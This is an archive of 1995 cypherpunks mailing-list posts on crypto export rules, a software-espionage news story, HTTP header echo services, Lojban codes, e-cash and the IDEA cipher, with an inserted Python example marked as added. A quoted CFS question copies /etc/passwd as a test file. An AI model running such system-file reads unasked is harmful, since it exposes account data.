> wore it to a dance club here in Baltimore, and no less than 6 people, all
> of whom I had never met before, approached me about it and wanted to talk
> about cypherpunk issues.  None of them were on the list.
----------------------------------------------------------------------
Same here.  I also find that it is a good way to let other people -know- about
ITAR and crypto.  At school I have had around 20 people ask me about it.  From
students to teacher to administration.  I also wore mine to a dance club here in
Salt Lake City and was approached by a few people.  I think it is a good way to
at least let people know about the situation.  Makes some new friends also.

Eldon Jenkins
PRODIGY Tech Support

===================
Usual disclaimer
===================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 25 Oct 95 21:16:53 PDT
To: cypherpunks@toad.com
Subject: Re: Welcome to cypherpunks
Message-ID: <9510260413.AA10784@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
>      Why am I getting this when I am already subscribed to the list??????
>      

Because someone signed the list up to the list...probably inadvertently.
They probably sent something to majordomo with a line like:

subscribe cypherpunks cypherpunks@toad.com

thinking it actually made sense for some reason...then again they might
have done it on purpose.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Wed, 25 Oct 95 18:20:44 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto's Role in Evil?
Message-ID: <9510260117.AA03480@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


I wrote:

>Date: Tue, 24 Oct 95 12:52:40 EDT
>In-Reply-To: Timothy C. May's message of Mon, 9 Oct 1995 11:20:41 -0700 <199510100354.UAA10505@comsec.com>
>Subject: Re: Crypto's Role in Evil?

>I heard a particularly scary quote from Director Freeh last Sunday on NPR's
>Weekend Edition (I believe that was the show -- segment A-1) in which he
>declared "our job is to protect the people".

The show was Thursday 10/19, All Things Considered.

BTW, there was another interesting quote on the 15th on ATC -- a segment
about the DA office in New Orleans -- with a DA claiming that the
presumption of innocence is a legal fiction which *starts* when the trial
starts -- implying that from arrest to trial, the person is guilty.

Interesting way of thinking....

 - Carl

 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 25 Oct 95 21:50:22 PDT
To: cypherpunks@toad.com
Subject: Re: E-mail Spy
In-Reply-To: <199510252241.XAA03507@utopia.hacktic.nl>
Message-ID: <Pine.ULT.3.91.951025214808.27266B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Oct 1995, Anonymous wrote:

> The Wall Street Journal, October 25, 1995.
> 
> 
> A '90s Espionage Tale Stars Software Rivals, E-Mail Spy
> 
> By Glenn Simpson

Intriguing story!

> The final twist: Performix last week agreed to be acquired by
> Pure Software Inc., a publicly held firm as large as Mercury
> Interactive -- which now will be up against someone its own size.

All I can say to this is DAMN! Pure Software offered me a job when they
were just a start-up, and I turned them down. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: btmoore@iquest.net (Benjamin T. Moore)
Date: Wed, 25 Oct 95 19:58:11 PDT
To: Ian Goldberg <cypherpunks@toad.com>
Subject: Re: Mandatory ID in California?
Message-ID: <m0t8IVw-00036cC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 08:45 AM 10/25/95 -0700, Ian Goldberg wrote:
>>From "The Daily Californian", Wed., 25 October, 1995, page 3:
>
><snip>
>"Police were called to the scene by an officer who passed Burton
>and smelled marijuana smoke, Phelps said.  The officer believed
>it was coming from Burton's cigarette.
>
>"The officer issued a citation to Burton for smoking marijuana
>and requested to see identification.  Burton refused to show
>identification and argued that smoking marijuana is legal in
>Berkeley, Phelps said.
>
>"The officer, in accordance with police policy, arrested Burton
>for refusing to properly identify himself."
><snip>
>
>That last sentence seemed ominous to me...
>
>   - Ian
>
Actually, "Failure to Identify" is a misdemeanor in most municipalities nationwide.
It is definitely so here in Indiana, and in most places I've been to. The only thing
surprising is that YOU were not aware of this! :-) The point being the Cops always
want to know who they're fuc... er, dealing with. The first thing they'll do is radio
in who they're accous... er, stopping. The reason for this is, should they get their
just desserts... I mean come to some harm, the rest of their gang... I mean, 
brother officers will know who to come after! :-)

Benjamin T. Moore, Jr.
(Jian #AJF IRChat)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Wed, 25 Oct 95 15:13:42 PDT
To: cypherpunks@toad.com
Subject: CTCP
Message-ID: <Pine.3.89.9510252311.A410-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



If Maude X (the author of CTCP) is still on the list, can they contact 
me, as I've been playing with it in the last few days and have added new 
features and increased the RNG security somewhat. If they're not around 
I'll release an updated 'unofficial' version in a week or two.

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 25 Oct 95 15:41:38 PDT
To: cypherpunks@toad.com
Subject: E-mail Spy
Message-ID: <199510252241.XAA03507@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



The Wall Street Journal, October 25, 1995.


A '90s Espionage Tale Stars Software Rivals, E-Mail Spy

By Glenn Simpson


Technothriller novelist Tom Clancy might have a hard time
dreaming this one up.

In a computer-age case of spy vs. spy, a small software firm
is claiming to have uncovered an industrial espionage attempt
by a much larger competitor by using a controversial e-mail
program.

Court documents and interviews tell a tale of intrigue,
deception and twist upon twist. Not to mention the alleged
involvement of a mysterious "classified government agency."

The protagonist is Performix Inc., a closely held
eight-year-old firm in McLean, Va., that has carved out a
significant niche for itself producing Empower, a software
program used for "load testing," which measures the ability of
a software program to serve many users simultaneously. Every
major computer manufacturer now uses Empower.

Enter Mercury Interactive Corp., a $300 million publicly
traded California firm that also is in the business of selling
software-testing products and produces competing software
called Load Runner. In June 1995, a senior Mercury Interactive
official, Graham Burnette, allegedly wrote to Performix
inquiring about a possible corporate alliance to develop
load-testing software. Performix spurned the offer.

Around the same time, a Virginia businessman named Joel
Dietrich, president of an obscure company called Styx Systems,
approached Performix asking to try out a version of Empower
known as Empower/CS on behalf of an anonymous client.
According to Performix, Mr. Dietrich said he couldn't identify
the client because it was a federal government intelligence
agency. On June 16 Performix granted Mr. Dietrich and Styx a
short-term license to use Empower/CS.

At 1:55 a.m. on Saturday, July 29, Performix received a most
curious e-mail message over the Internet. The message
indicated that someone who wasn't authorized to do so was
trying to install Empower/CS on a large computer and examine
its "source codes" -- the software's secret programming
language. A feature Performix had embedded in Empower/CS
automatically causes an e-mail alert to be sent to Performix
whenever there are indications the software is being used
improperly.

The e-mail indicated the address from which it had been sent:
"merc-int.com." This is the registered Internet address of
Mercury Interactive.

The e-mail also gave the name of the network on which someone
was installing the copy of Empower/CS: "testrun.mercury."

The license number of the software apparently now in Mercury
Interactive's hands, the e-mail further indicated, was the
license number of the copy that had been leased to Styx.

While Mercury Interactive and Mr. Dietrich have disavowed any
knowledge of a possible software transfer, Mercury
Interactive's Mr. Burnette acknowledged in an interview that
Mr. Dietrich's daughter and son-in-law work for Mercury
Interactive.

In mid-August, in U.S. District Court in Alexandria, Va.,
Performix sued Mercury Interactive, Styx and Dietrich,
alleging copyright infringement, fraud, conversion, unfair
competition, breach of contract and unjust enrichment.
Performix alleges Mercury Interactive "acquired Empower/CS so
that it could unlawfully, willfully and maliciously copy, use
and/or reverse engineer Empower/CS for the purpose of
improving the performance and features of existing Mercury
Interactive products in an attempt to gain significant
economic advantage."

Mercury Interactive hasn't yet formally responded to the
allegations, but Mr. Burnette denied any wrongdoing by the
company. "Mercury Interactive has a very strong policy against
industrial espionage," he said. "We don't do it."

Mr. Dietrich's response filed with the court has raised some
eyebrows. While claiming no knowledge of any transfer to
Mercury, he hasn't backed away from his claim to be working
for the federal government. Indeed, Mr. Dietrich is asserting
that he is immune from the suit because he was acting as an
agent of the U.S. government. He claims in court papers that
he obtained the software on behalf of "a classified government
agency."

None of the parties to the case who were willing to be
interviewed said they knew the identity of the agency, and Mr.
Dietrich didn't respond to interview requests. However, Mr.
Burnette of Mercury Interactive said: "I know that Mr.
Dietrich works as a contractor for a government agency. I know
it's a secret government agency, but I don't know what it is."

Officials of both Mercury Interactive and Performix said the
two firms have reached a tentative settlement, although they
disagree on what it contains. "Everything Performix needed
from a business perspective they received, including the
ability to review Mercury Interactive product releases," said
Performix attorney Nelson Blitz. In addition, "money will be
paid to Performix under this agreement in principle." But Mr.
Burnette asserted that no money would change hands.

The penultimate turn: Mr. Burnette claims that Performix is
eager to settle the case because it has a problem of its own.
He contends that it is illegal to secretly embed in commercial
software code a program that causes the customer's computer to
send out e-mail. Mr. Blitz of Performix denied there was
anything legally questionable about the practice and said
Mercury Interactive never raised that issue in settlement
negotiations. He also said the feature isn't intended to be a
spycatcher. Rather, he said, it is meant solely to help
clients who are improperly installing the product by alerting
Performix that they need help. Empower's documentation informs
customers of the feature, he added.

James Haggard, president of Vasco Data Security Inc., said the
purpose of such programs is ambiguous, and it would be hard to
rebut Performix's claim that the feature is merely meant to
serve the customer. He noted that Microsoft Corp.'s new
Windows 95 software contains a program that can send Microsoft
a report on the software products being used by those who sign
up for its on-line service albeit only with the users'
permission. While critics label it a means of economic
snooping, the company says the program simply helps it assist
customers.

"The concept of a program calling home of its own accord" is
controversial in the computer industry, said computer security
expert Samuel Bellovin of Bell Labs. "People tend to get very
upset when it happens," he said, because it can look as if the
software maker is spying on them.

The final twist: Performix last week agreed to be acquired by
Pure Software Inc., a publicly held firm as large as Mercury
Interactive -- which now will be up against someone its own size.

-----


[How many CompSecExp S. Bellovins o'BellLabs?]









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Goh Seow Hiong <shgoh@ncb.gov.sg>
Date: Wed, 25 Oct 95 19:18:59 PDT
To: cypherpunks@toad.com
Subject: symmetric key algorithms
Message-ID: <Pine.3.89.9510261019.A29735-0100000@gallery.ncb.gov.sg>
MIME-Version: 1.0
Content-Type: text/plain



Could anyone comment on the acceptability and reliability of the 
SAFER algorithm, in comparison with other algorithms such as IDEA,
Triple-DES, DES, RC4, ....  Has there been any comparison paper 
written on the pros and cons of the different symmetric key algorithms?

Thanks..

SH





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Johnson@Colorado.EDU (Richard Johnson)
Date: Thu, 26 Oct 95 09:19:31 PDT
To: cypherpunks@toad.com
Subject: HTTP Request-Header & Server Environment Echoes
Message-ID: <v02130500acb55ea73e82@[204.131.233.57]>
MIME-Version: 1.0
Content-Type: text/plain


<HTML>
<HEAD>
    <TITLE>What Your Browser Says Behind Your Back</TITLE>
</HEAD>
<BODY>
<PRE><TT>

The

    what your browser told me about you when you weren't looking

echo CGI at UIUC mentioned on cypherpunks
(http://www.hks.net/cpunks/cpunks-9/0095.html) in Nov. 1994 seems to be down
for the count (it was http://www.uiuc.edu/cgi-bin/printenv).  It would provide
you with a page showing the information your browser had given to the server
in the HTTP Request-Header.

However, others exist to take up the slack. Here's a directory I compiled
today (thanks to WWWW, Lycos, etc.) of current, working HTTP
Request-Header and resulting server environment variable echoes. I'm sure
I've missed some, if not many. Follow up with additions, if you want.
Better yet, add these and the additions to your favorite privacy and
security pages.

HTTP Request-Header Echoes

Machine Information at MIT (http://www.mit.edu:8001/machine)
    Feeds back your machine name, IP address, and finger info.  Not really
    a request-header echo at all, but useful.

Echo at TU-Berlin
(http://www.cs.tu-berlin.de/sui/eserte/cgi-rcs/home/eserte/.public_html/index.html)
    Raw text echo of your HTTP request-header info.

Echo by Pierre Omidyar at best.com (http://www.best.com/~pierre/printenv.cgi)
and at ebay.com (http://www.ebay.com/printenv.cgi)
    Two paths for reaching the same CGI script. Produces nicely formatted
    HTML output showing your HTTP request-header info. Simple perl source
    for the script is available from Pierre's Web Tips
    (http://www.best.com/~pierre/web-authoring.html) page.

Echo by mjd at cis.upenn.edu (http://www.cis.upenn.edu/cgi-bin/mjd/printenv)
    Produces formatted HTML echo of your HTTP request-header info.

Echo at hyperreal.com (http://www.hyperreal.com/cgi-bin/printenv)
    Produces plaintext HTML echo of your HTTP request-header info.

Echo at Whitehead Institute--MIT
(http://www-genome.wi.mit.edu/WWW/examples/Ch9/printenv.pl)
    Produces formatted HTML echo of your HTTP request-header info. Simple
    perl source for this script is available in the Chapter 9 script
    examples (http://www-genome.wi.mit.edu/WWW/examples/Ch9/) from
    Lincoln Stein (http://www-genome.wi.mit.edu/~lstein/)'s book, How to
    Set Up And Maintain a World Wide Web Site
    (http://www-genome.wi.mit.edu/WWW/).

Echo by cloos at io.com (http://www.io.com/cgi-user/cloos/environment)
    Raw text echo of your HTTP request-header info. Also provides a whole
    bunch more, including the script's runtime environment.

And now, again in the original HTML:

</TT></PRE><BR>
The 
<P><CENTER><STRONG><EM>what your browser told me about you when you weren't looking</EM></STRONG></CENTER>
<P>echo CGI at UIUC <A HREF="http://www.hks.net/cpunks/cpunks-9/0095.html">mentioned
on cypherpunks</A> in Nov. 1994 seems to be down for the count (it was http://www.uiuc.edu/cgi-bin/printenv).
It would provide you with a page showing the information your browser had
given to the server in the HTTP Request-Header.<BR>
<BR>
However, others exist to take up the slack. Here's a directory I compiled
today (thanks to WWWW, Lycos, etc.) of current, working HTTP Request-Header
and resulting server environment variable echoes. I'm sure I've missed some,
if not many. Follow up with additions, if you want. Better yet, add these
and the additions to your favorite privacy and security pages.<BR>
<H3>HTTP Request-Header Echoes</H3>
<DL>
<DT>Machine Information at MIT
<DD>Feeds back your machine name, IP address, and finger info. Not really
a request-header echo at all, but useful. 
<DT><A HREF="http://www.cs.tu-berlin.de/sui/eserte/cgi-rcs/home/eserte/.public_html/index.html">Echo
at TU-Berlin</A> 
<DD>Raw text echo of your HTTP request-header info. 
<DT><A HREF="http://www.best.com/~pierre/printenv.cgi">Echo by Pierre Omidyar
at best.com</A> and at ebay.com
<DD>Two paths for reaching the same CGI script. Produces nicely formatted
HTML output showing your HTTP request-header info. Simple perl source for
the script is available from <A HREF="http://www.best.com/~pierre/web-authoring.html">Pierre's
Web Tips</A> page. 
<DT><A HREF="http://www.cis.upenn.edu/cgi-bin/mjd/printenv">Echo by mjd
at cis.upenn.edu</A> 
<DD>Produces formatted HTML echo of your HTTP request-header info. 
<DT>Echo at hyperreal.com
<DD>Produces plaintext HTML echo of your HTTP request-header info. 
<DT><A HREF="http://www-genome.wi.mit.edu/WWW/examples/Ch9/printenv.pl">Echo
at Whitehead Institute--MIT</A> 
<DD>Produces formatted HTML echo of your HTTP request-header info. Simple
perl source for this script is available in the <A HREF="http://www-genome.wi.mit.edu/WWW/examples/Ch9/">Chapter
9 script examples</A> from <A HREF="http://www-genome.wi.mit.edu/~lstein/">Lincoln
Stein</A>'s book, <CITE><A HREF="http://www-genome.wi.mit.edu/WWW/">How
to Set Up And Maintain a World Wide Web Site</A></CITE>. 
<DT><A HREF="http://www.io.com/cgi-user/cloos/environment">Echo by cloos
at io.com</A> 
<DD>Raw text echo of your HTTP request-header info. Also provides a whole
bunch more, including the <EM>script's</EM> runtime environment. 
</DL>
</BODY>
</HTML>
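
Added example (not part of the original message, and not the source of any script listed in it): a sketch of what a printenv-style echo does with one request, mapping the HTTP request headers to CGI environment variables and marking the ones that identify the user. The sample request, the address 192.0.2.57 and all function names are constructed for illustration.

```python
"""Added example: the variables a printenv-style echo CGI would show for one request."""
import html

# Constructed sample request; every value in it is made up for this example.
SAMPLE_REQUEST = (
    "GET /cgi-bin/printenv?src=privacy-page HTTP/1.0\r\n"
    "User-Agent: ExampleBrowser/1.1 (X11; SunOS 4.1.3)\r\n"
    "Referer: http://intranet.example.com/projects/secret-plan.html\r\n"
    "From: alice@example.com\r\n"
    "Accept: text/html, image/gif\r\n"
    "Accept: image/jpeg\r\n"
    "Authorization: Basic Y29uc3RydWN0ZWQ6c2FtcGxl\r\n"
    "\r\n"
)

# Variables that identify the user or the user's activity, and why.
PRIVACY_NOTES = {
    "REMOTE_ADDR": "network address of the client or its proxy",
    "HTTP_USER_AGENT": "browser name, version and often the platform",
    "HTTP_REFERER": "the page the user came from, private URLs included",
    "HTTP_FROM": "the user's e-mail address, if the browser sends it",
    "HTTP_COOKIE": "state that links this request to earlier ones",
    "HTTP_ACCEPT_LANGUAGE": "the user's language preferences",
}


def parse_request(raw):
    """Split a raw request into (method, target, protocol, [(name, value)])."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    parts = lines[0].split()
    if len(parts) < 2:
        raise ValueError("malformed request line: %r" % lines[0])
    # A request line without a version is an HTTP/0.9 simple request.
    protocol = parts[2] if len(parts) > 2 else "HTTP/0.9"
    headers = []
    for line in lines[1:]:
        if line[:1] in (" ", "\t") and headers:
            # Folded continuation line: append to the previous header value.
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
            continue
        name, sep, value = line.partition(":")
        if sep and name.strip():
            headers.append((name.strip(), value.strip()))
    return parts[0], parts[1], protocol, headers


def cgi_environment(raw, remote_addr):
    """Build the CGI meta-variables a server would hand to the echo script."""
    method, target, protocol, headers = parse_request(raw)
    path, _, query = target.partition("?")
    env = {
        "REQUEST_METHOD": method,
        "SCRIPT_NAME": path,  # simplification: no PATH_INFO handling
        "QUERY_STRING": query,
        "SERVER_PROTOCOL": protocol,
        "REMOTE_ADDR": remote_addr,
    }
    for name, value in headers:
        key = name.upper().replace("-", "_")
        if key in ("AUTHORIZATION", "PROXY_AUTHORIZATION"):
            continue  # credentials should not be passed on to scripts
        if key not in ("CONTENT_TYPE", "CONTENT_LENGTH"):
            key = "HTTP_" + key
        # Repeated headers are combined into one comma-separated value.
        env[key] = env[key] + ", " + value if key in env else value
    return env


def disclosures(env):
    """Return (variable, value, reason) for each privacy-relevant variable."""
    return [(k, env[k], PRIVACY_NOTES[k]) for k in sorted(env) if k in PRIVACY_NOTES]


def render_echo(env):
    """Render the echo page; values are client-controlled, so escape them."""
    rows = ["%s=%s" % (html.escape(k), html.escape(v)) for k, v in sorted(env.items())]
    return "<pre>\n" + "\n".join(rows) + "\n</pre>"


if __name__ == "__main__":
    sample_env = cgi_environment(SAMPLE_REQUEST, "192.0.2.57")
    print(render_echo(sample_env))
    for var, _value, reason in disclosures(sample_env):
        print("%s: %s" % (var, reason))
```

Because an echo page reflects whatever the client sent, the escaping in `render_echo` is what keeps a crafted header value from being interpreted as markup.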






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@cs.monash.edu.au>
Date: Wed, 25 Oct 95 19:24:55 PDT
To: sjb@universe.digex.net (Scott Brickner)
Subject: Re: A secure cryptosystem with a 40-bit key?
In-Reply-To: <199510251650.MAA24629@universe.digex.net>
Message-ID: <199510260221.MAA29674@molly.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com
  and Scott Brickner <sjb@universe.digex.net>

S.B. writes:
> Jiri Baum writes:
> >.u'u I believe that you were wrong when you expressed a symbol for the
...
> Well, I was definitely oversimplifying things.

No problem. You just have to be careful when you are generating your
wordlist, that's all.

...
> >Yeah, and a huge beast it is. If you can make a YACCable language with
> >one page of rules (say 16 :-) ), *then* I'll be impressed.
> 
> I'm sure that one could be done on one page, but I doubt it would have
...

One would need a great deal of inspiration to make it work. However,
I do think that it is possible.

...
> >> A message written entirely using native Lojban words can be encrypted
> >> in a codebook fashion where the particular codebook to be used is a
> >...
> >You have to be careful here - the structure words (cmavo) are divided
...
> To achieve the goal of the cryptosystem it may not be necessary to
> encode the cmavo, since they have no real meaning on their own, just
...

How about the numerical cmavo? You'd want to encode numbers. And you
don't want people to know they are numbers, because they could
count the digits (to get order of magnitude). Same for spelling cmavo.

How about the tense system? You'd want to encode that because it could
give important hints to locations (and times). Then again you could
probably avoid using the "a little to the north and a long way east" tense
altogether...

How about the attitudinals?

> The selma'o that only have one member are especially meaning-free, as
> they're typically elidable terminators and such.

Like I said, I only glanced at it, but how about NAI and GAI?

...
> >Yes, but the grammatical structure itself may reveal heaps.
> >(Except for trivial statements.)
> 
> In a natural language this might be true, but in Lojban the grammar's
> regularity eliminates much of this information.
...

I'm not sure I'd agree here. I suspect you are overestimating the regularity
of lojban grammar (then again maybe I'm underestimating...).

...
> >Not really; you just need to make sure that you conjugate the coded words.
> >(Ie substitute nouns for nouns, verbs for verbs, etc.)
> 
> Irregularities make this nearly impossible for computers, though.

Yes (though I'd feel quite confident doing it for Esperanto).

> There are also problems due to ambiguity.

Yup. If it's really a problem - ambiguity in language has been with us
for a long time and nobody minds much. But I guess you wouldn't want
arbitrary ambiguity in your text (you could have an interactive coder
which immediately alerts you to all alternative meanings). Or you could
put marks into your text to separate the word parts (like some beginner
Esperanto books do) thus eliminating the problem.

> The even bigger inconvenience with natural languages comes in defining
> the codebook.
...

I'm sure you could easily find wordlists giving the "first X" words of
Esperanto - you could just standardize on one of them.


Mi esperas ke tio cxi sencas...

Adiaux - Jiri
- --
<jirib@cs.monash.edu.au>     <jiri@melb.dialix.oz.au>     PGP 463A14D5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 25 Oct 95 21:25:28 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <199510241425.HAA06922@jobe.shell.portal.com>
Message-ID: <199510260424.OAA12383@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Hal <hfinney@shell.portal.com>
  and cypherpunks@toad.com

H wrote:
> Jiri Baum <jirib@sweeney.cs.monash.edu.au> writes:
...
> >An interesting question is whether Bob and Nick can now collude to
> >expose Alice. Therefore Alice would at least want to verify that the
...
> 
> I don't think they can.  All Bob sees is his own blinded coin, and the
...

What I meant is, are there any proto-coins that will show through
a blinding? (Mathematically special values like fixed points.)

> However, the timing is a problem.  Bob knows _when_ Alice communicated
...

So it is.

What you'd really want is for Alice to pay for the new coins in ecash.


I'm wondering whether a "coin-changer" would be easier or harder to
set up than a "bank" (from regulatory point of view).

After all, for e-cash you don't really need accounts; you just need:
  - verify coins (coin-changer) ie ecash->ecash
  - buy coins (join the system) ie  cash->ecash
  - sell coins (redeem)         ie ecash->cash

Any cyberspace banks can be completely separate from the ecash issuer.


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Fri, 27 Oct 95 13:34:56 PDT
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: New release of CFS Unix encrypting file system available
In-Reply-To: <199510271954.PAA20647@universe.digex.net>
Message-ID: <199510272036.UAA28683@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


> What happens to hard links?
> 
> mkdir foo bar
> CFS_set_directory_key -directory ./foo -key foo-key
> CFS_set_directory_key -directory ./bar -key bar-key

This isn't how it works.  You "attach" an encrypted directory to a
virtual namespace into which you write (and read) the cleartext.  It's
similar to mounting a file system.

> cp /etc/passwd ./foo/test1
> ln ./foo/footest ./bar/bartest
> cmp ./foo/footest ./bar/bartest

Hard links don't work across different "attached" directories (just as
they don't work across different file systems).

-matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Patterson <lep@tanju.wsnet.com>
Date: Fri, 27 Oct 95 15:51:39 PDT
To: bluebird@alpha.c2.org
Subject: Re: Need Mail-to-News gates
In-Reply-To: <199510272159.OAA06298@infinity.c2.org>
Message-ID: <Pine.LNX.3.91.951027175407.19464A-100000@tanju.wsnet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Oct 1995 bluebird@alpha.c2.org wrote:

> Could someone PLEASE netmail me some _known reliable_ gates that use the
> straight netmail address format (alt.whatnot@bosco.kollege.edu)?

If someone will direct me to sources, I'll try and setup a gate. (We use 
INN).

Alan Patterson (lep@wsnet.com)        Fngpt: 41D0F61B496FECC09FABECF686AB2A1C
WSNetwork Communications Services, Inc.         PGP Encrypted Email Preferred
Montgomery, Alabama (334) 263-5505 (800) INET-750  Public Key @ MIT keyserver





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@pdcorp.com (Dan Weinstein)
Date: Fri, 27 Oct 95 17:47:15 PDT
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: CJR returned to sender
In-Reply-To: <Pine.SUN.3.91.951027100225.10892F-100000@viper.law.miami.edu>
Message-ID: <199510280045.RAA10830@email.pdcorp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Oct 1995 10:05:10 -0400 (EDT), you wrote:

>And yet people like MIT get approval for the release of PGP this way.
>
>It is clear that 
>1) the government will (verbally?) clear the "PGP procedure" when pushed.

Yes, I believe that they have only ever given verbal agreement to this
sort of thing, which is worth the air it is written on.

>2) they need to be pushed.
>
>If anyone from MIT is reading this, it would be a real public service to 
>put on a web site (a) what the system used for the release of PGP is 
>exactly and (b) what assurances (oral, written, names & dates) was 
>received from State/Commerce that this was legal.

You are assuming that because the government has chosen not to
prosecute MIT that they will not prosecute anyone else.  This is a
faulty assumption, laws are not invalidated if they are not enforced,
only if they are repealed or overturned.

>Publicizing this information would lay the groundwork for APA (or, given
>the way the ITAR is written, maybe no...) and 5th Amendment / due process
>challenges by other parties unable to get the straight answers they
>deserve. 

There are certainly issues that need to be discussed here, and before
any such discussion can take place we need a determination from the
government as to what sort of verification is adequate.


Dan Weinstein
djw@pdcorp.com
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 28 Oct 95 05:50:17 PDT
To: cypherpunks@toad.com
Subject: EE Times on IDEA
Message-ID: <199510281250.NAA14958@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Electronic Engineering Times
Oct 23, 1995 p. 66

T.R MADHUSUDAN SASTRY,
T. GANESAN, B.MADHUKAR
AND N. SRINIVASA

MOTOROLA INDIA ELECTRONICS Pvt. Ltd.
BANGALORE, INDIA

Time is right for a good, secure 'Idea'

Computers are the medium in which almost all of today's business deals and international transactions transpire. That calls for the development of secure systems, which protect data from being accessed by unauthorized users. Digital Encryption Standard (DES) is a cipher system that uses a 64-bit-long secret key. With present computer technology, it is not difficult to break DES by trying all possible keys. That made cryptographers look for different encryption algorithms that take a long time for today's computers to break the code. The International Data Encryption Algorithm (Idea) is a private key-block ciphering scheme, which is computationally highly secure since it uses a 128-bit-long secret key. The brute force method of breaking the code (trying all possible combinations as keys) would require 10^24 years for a chip that can test a billion keys per second. The design philosophy of Idea is to mix the operations from different algebraic groups to add confusion and diffusion to the input data. The operations are addition modulo, multiplication modulo, and exclusive OR (XOR).

We have implemented Idea in electronic-code-book (ECB) mode on the Motorola DSP 561xx family of processors. In ECB mode, a 64 bit input block is encrypted to generate a 64-bit output block that is transmitted to the receiver through insecure but error free channels. In Idea, all the algebraic operations work with 16-bit blocks of data. That makes the algorithm efficient on a 561xx DSP, which has a very good instruction set to perform the addition modulo 2^16, multiplication modulo 2^16 + 1 and 16-bit XOR operations.

The Idea is a block-cipher scheme in which the incoming data is divided into blocks of 64 bits and fed as input to the encryption algorithm (see figure). The 64 bit data X= (X1 X2 X3 . . . X64) is initially divided into 4 subblocks X1, X2, X3 and X4, each of 16 bits. These four sub-blocks become input for the first round of operation. In each round, each subblock is added and multiplied under modulo fields with key subblocks, thus adding more confusion and diffusion.

The sequence of operations for the first round is given below; it's the same for all rounds of operations except for different key subblocks.

[1] Multiply X1 and K1 (first key subblock Z1^1) under modulo 2^16 + 1
[2] Add X2 and K2 (Z2^1) under modulo 2^16
[3] Add X3 and K3 under modulo 2^16
[4] Multiply X4 and K4 under modulo 2^16 + 1
[5] XOR the results of step 1 and step 3
[6] XOR the results of step 2 and step 4
[7] Multiply the results of step 5 and K5 under modulo 2^16 + 1
[8] Add the results of step 6 and step 7
[9] Multiply the results of step 8 and K6 under modulo 2^16 + 1
[10] Add the results of step 7 and step 9 under modulo 2^16
[11] XOR the results of step 1 and step 9
[12] XOR the results of step 3 and step 9
[13] XOR the results of step 2 and step 10
[14] XOR the results of step 4 and step 10

